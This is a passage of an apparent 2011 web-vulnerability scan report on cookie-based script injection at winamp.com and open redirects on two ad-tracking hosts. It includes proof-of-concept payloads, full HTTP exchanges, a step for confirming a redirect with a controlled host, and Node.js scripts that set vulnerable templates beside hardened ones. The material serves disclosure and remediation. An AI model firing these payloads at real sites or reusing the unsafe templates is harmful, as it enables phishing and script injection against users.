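The three winamp.com findings on this page share one sink: the countryCookie value is written into a JavaScript string literal inside an inline script, so a double quote in the cookie ends the literal and the rest is parsed as code. The Node.js script below is an added example, not winamp.com's code. It reproduces that sink with a naive template beside a hardened one and runs both generated scripts with a stubbed alert to show which one executes the payload. The payload string is the one the report shows reflected; the function names renderCntCodeUnsafe, renderCntCodeSafe, jsStringLiteral, runInline and containsScriptClose, and the shape of the server-side template, are assumptions introduced here.

```javascript
'use strict';

// Added example, not code from winamp.com. The payload is the one the report
// shows reflected into: Common.cntCode="US<payload>";
const PAYLOAD = 'USef6c8"-alert(1)-"2de3f40c518';

// Vulnerable pattern (assumed shape of the server-side template): the cookie
// value is dropped between two double quotes with no encoding at all.
function renderCntCodeUnsafe(countryCookie) {
  return 'Common.cntCode="' + countryCookie + '";';
}

// Hardened form: emit a JSON string literal, then escape the characters that
// the HTML parser or JS tokenizer treats specially even inside a string.
// JSON.stringify handles " and \ ; the extra escapes stop </script> from
// terminating the script element and U+2028/U+2029 from ending the line.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderCntCodeSafe(countryCookie) {
  return 'Common.cntCode=' + jsStringLiteral(countryCookie) + ';';
}

// Execute the generated inline script with a stub alert() and a fresh Common
// object, and report what happened. This stands in for the browser: the JS is
// the same, only the alert is counted instead of shown.
function runInline(script) {
  const Common = {};
  let alertCalls = 0;
  let error = null;
  try {
    new Function('Common', 'alert', script)(Common, () => { alertCalls += 1; });
  } catch (e) {
    error = e;
  }
  return { cntCode: Common.cntCode, alertCalls, error };
}

// Would the generated script break out of its <script> element when parsed as
// HTML? A correct JS string literal alone does not protect against </script>.
function containsScriptClose(script) {
  return /<\/script/i.test(script);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const p of [PAYLOAD, '</script><script>alert(1)</script>']) {
    const unsafe = renderCntCodeUnsafe(p);
    const safe = renderCntCodeSafe(p);
    console.log('payload      :', JSON.stringify(p));
    console.log('unsafe script:', unsafe, '->', runInline(unsafe));
    console.log('safe script  :', safe, '->', runInline(safe));
    console.log('unsafe breaks out of <script>:', containsScriptClose(unsafe));
    console.log('safe breaks out of <script>  :', containsScriptClose(safe));
  }
}
```

With the report's payload the unsafe template evaluates `"USef6c8" - alert(1) - "2de3f40c518"`, so alert runs once and cntCode ends up NaN; the hardened template yields the original cookie value unchanged and never calls alert. The second payload shows why escaping `<` matters even when the quoting is correct.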
The value of the countryCookie cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff2bf"-alert(1)-"2712191debe was submitted in the countryCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /media-player/en HTTP/1.1 Host: www.winamp.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com/login.php?do=login Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828671740-New%7C1361900671740%3B%20s_nrgvo%3DNew%7C1361900671741%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/media-player%252526ot%25253DA%3B; countryCookie=USff2bf"-alert(1)-"2712191debe
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:44:57 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 46321
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <script type="text/javascript">Common.cntCode="USff2bf"-alert(1)-"2712191debe";</script> ...[SNIP]...
The value of the countryCookie cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4db17"-alert(1)-"8eb02fd3069 was submitted in the countryCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /skin/slick-redux/222084 HTTP/1.1 Host: www.winamp.com Proxy-Connection: keep-alive Referer: http://www.winamp.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; countryCookie=US4db17"-alert(1)-"8eb02fd3069; s_pers=%20s_getnr%3D1298828716004-New%7C1361900716004%3B%20s_nrgvo%3DNew%7C1361900716004%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-main%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/skin/slick-redux/222084%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:45:35 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 34378
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <script type="text/javascript">Common.cntCode="US4db17"-alert(1)-"8eb02fd3069";</script> ...[SNIP]...
4. Open redirection
There are 4 instances of this issue:
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
The value of the ru request parameter is used to perform an HTTP redirect. The payload http%3a//ad8127a790827d41e/a%3fhttp%3a//ar.atwola.com/atd%3fit%3d7%26iv%3d<na_id>%26rand%3d329065 was submitted in the ru parameter. This caused a redirection to the following URL (as shown in the Location header of the response):
http://ad8127a790827d41e/a?http://ar.atwola.com/atd?it=7&iv=&rand=329065
Request
GET /e/getdata.xgi?dt=br&pkey=jtkr94hrnfw22&ru=http%3a//ad8127a790827d41e/a%3fhttp%3a//ar.atwola.com/atd%3fit%3d7%26iv%3d<na_id>%26rand%3d329065 HTTP/1.1 Host: r.nexac.com Proxy-Connection: keep-alive Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: na_tc=Y; OAX=rcHW801i4e0ADNVY
Response
HTTP/1.1 302 Found Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE" Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ X-Powered-By: Jigawatts Location: http://ad8127a790827d41e/a?http://ar.atwola.com/atd?it=7&iv=&rand=329065 Content-type: text/html Date: Sun, 27 Feb 2011 17:45:09 GMT Server: lighttpd/1.4.18 Content-Length: 1
4.2. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]
Summary
Severity: Low
Confidence: Certain
Host: http://tags.crwdcntrl.net
Path: /5/c=25/b=1225394
Issue detail
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a2fb1007d6302d504/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:
http://.a2fb1007d6302d504/=1
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can append text that is still parsed as part of the host, for example a further domain label that turns the intended host into a subdomain of one they control. In this instance the Location header shows that the prefix is no more than the scheme (http://), so the entire parameter name, leading dot included, becomes the authority of the redirect target. To confirm exploitability, resubmit with a parameter name consisting of a host you control followed by a slash, without the leading dot, and check that the Location header points at that host.
Request
GET /5/c=25/b=1225394?.a2fb1007d6302d504/=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project-syndicate.org/series_metacategory/1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:34 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdy6jIGBUS%2Fl7SQNBlkGBgElBjDoBZM8l8GU4FcwxcsMpoTaIHI3IYLSEB4fmOJ6DKZEFcAU%2F18wJcwBpth4wRSHEZjiE4WoFAZTAschRj%2BD6HODWBsBESyGUCUQi943MDQAzdQHU7z%2FII4whZgSARbk8geyAZ6KFaA%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:34 GMT; Path=/ Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1mX%2Fv2w5zMDAqJfydpIGSIyBzVlWiYmBQZKB4T8jA8OX%2F3%2BAFJCRKrRpEyNMGMjQFNq0A5lvo8z1F5nPpBTvgqyfUWirJUj%2B%2F18on4FDpk4d3SKu1kkYQvUN6ELcCbvQhTgfL8dUtRNdiK%2FiLbqQrNlFdCEAUQFZHg%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:34 GMT; Path=/ Location: http://.a2fb1007d6302d504/=1 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0
4.3. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]
Summary
Severity: Low
Confidence: Certain
Host: http://tags.crwdcntrl.net
Path: /5/c=25/b=1225400
Issue detail
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .af7444b5c923be2c5/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:
http://.af7444b5c923be2c5/=1
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can append text that is still parsed as part of the host, for example a further domain label that turns the intended host into a subdomain of one they control. As in 4.2, the Location header shows that the prefix is only the scheme (http://), so the whole parameter name becomes the authority of the redirect target.
Request
GET /5/c=25/b=1225400?.af7444b5c923be2c5/=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project-syndicate.org/series_metacategory/1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:09 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdzay8DAqJfyVl%2BMQZaBQUCJAQx6wSTPZTAl%2BBVM8TKDKaE2iNxNiKA0hMcHprgegylRBTDF%2FxdMCXOAKTZeMMVhBKb4RCEqhcGUwHGI0c8g%2Btwg1kZABIshVAnEovcNDA1AM%2FXBFO8%2FiCNMIaZEgAW5%2FIFsACsbFRI%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:09 GMT; Path=/ Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1t7%2FX7bcYWBg1Et5qy8GEmNgc5ZVYmJgkGRg%2BM%2FIwPDl%2Fx8gBWToCW3awQgTBjJ0hDZtAvH%2F%2F4XwGZXiXZDVMypz%2FUVWzyi01RJFPQOHTJ06ukVcrZMwhOob0IW4E3ahC3E%2BXo6paie6EF%2FFW3QhWbOL6EIAQVhaNQ%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:09 GMT; Path=/ Location: http://.af7444b5c923be2c5/=1 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0
4.4. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]
Summary
Severity: Low
Confidence: Certain
Host: http://tags.crwdcntrl.net
Path: /5/c=25/b=1226041
Issue detail
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a87ccf957205615f6/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:
http://.a87ccf957205615f6/=1
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can append text that is still parsed as part of the host, for example a further domain label that turns the intended host into a subdomain of one they control. As in 4.2, the Location header shows that the prefix is only the scheme (http://), so the whole parameter name becomes the authority of the redirect target.
Request
GET /5/c=25/b=1226041?.a87ccf957205615f6/=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project-syndicate.org/series_metacategory/1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:36 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdy6goGBUS%2Fl7cx3DLIMDAJKDGDQCyZ5LoMpwa9gipcZTAm1QeRuQgSlITw%2BMMX1GEyJKoAp%2Fr9gSpgDTLHxgikOIzDFJwpRKQymBI5DjH4G0ecGsTYCIlgMoUogFr1vYGgAmqkPpnj%2FQRxhCjElAizI5Q9kAwBFQhZv; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:36 GMT; Path=/ Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1hX%2Fv2w5yMDAqJfyduY7kBgDm7OsEhMDgyQDw39GBoYv%2F%2F8AKSBjntBWS0aYMJChI7RpBzLfRmjTJmS%2BhTLXX2Q%2Bs1K8C7J5jAwcMnXq6BZxtU7CEKpvQBfiTtiFLsT5eDmmqp3oQnwVb9GFZM0uogsBAAadWGM%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:36 GMT; Path=/ Location: http://.a87ccf957205615f6/=1 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0
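The four open-redirect findings in this section have two shapes: r.nexac.com (4.1) redirects to whatever absolute URL arrives in ru, and tags.crwdcntrl.net (4.2 to 4.4) builds the Location header by concatenating a fixed prefix with attacker-controlled text. The Node.js script below is an added example, not code from either vendor. It reproduces the concatenation bug, shows the two host-smuggling tricks that a prefix without a trailing slash permits (appending a further domain label, and turning the intended host into userinfo with @), and contrasts it with a validator that resolves the user-supplied value against the allowed origin and refuses any redirect whose origin changes, which also handles the absolute-URL shape of 4.1. The function names and the www.example.com and attacker.example hosts are assumptions introduced here.

```javascript
'use strict';

// Added example, not crwdcntrl.net's or nexac.com's code. Hosts are made up.
const ALLOWED_ORIGIN = 'https://www.example.com';

// The 4.2-4.4 pattern: a fixed prefix is glued to user-controlled text.
// Without a trailing slash the user text is still inside the authority part.
function naiveRedirect(prefix, userPart) {
  return prefix + userPart;
}

// Where does a browser actually end up? Returns the hostname the WHATWG URL
// parser extracts, or null when the string is not a valid absolute URL.
function landingHost(location) {
  try {
    return new URL(location).hostname;
  } catch (e) {
    return null;
  }
}

// Hardened form: treat the user value as a path relative to the allowed
// origin, resolve it, and refuse the redirect if the origin changed. An
// absolute URL (the 4.1 shape), a protocol-relative //host, a \\host (which
// browsers treat like //host for http/https) or a javascript: URL all resolve
// to a different origin and are rejected; plain paths are kept.
function safeRedirectTarget(userValue, allowedOrigin = ALLOWED_ORIGIN) {
  let resolved;
  try {
    resolved = new URL(userValue, allowedOrigin);
  } catch (e) {
    return null;
  }
  if (resolved.origin !== new URL(allowedOrigin).origin) {
    return null;
  }
  return resolved.href;
}

if (typeof require !== 'undefined' && require.main === module) {
  const cases = [
    '.attacker.example/x',      // suffix trick: host becomes www.example.com.attacker.example
    '@attacker.example/x',      // userinfo trick: www.example.com becomes the username
    '/account',                 // the only legitimate shape
    '//attacker.example/x',     // protocol-relative absolute URL
    'http://attacker.example/', // absolute URL, the 4.1 shape
  ];
  for (const c of cases) {
    const loc = naiveRedirect('http://www.example.com', c);
    console.log(JSON.stringify(c).padEnd(28), 'naive ->', landingHost(loc), '| safe ->', safeRedirectTarget(c));
  }
}
```

Adding the trailing slash to the prefix closes the two host-smuggling cases but still lets the caller choose an arbitrary path on the allowed host, so the validator form is the one to ship: it makes the allowed origin the single decision point and needs no knowledge of which characters the URL parser treats as authority delimiters.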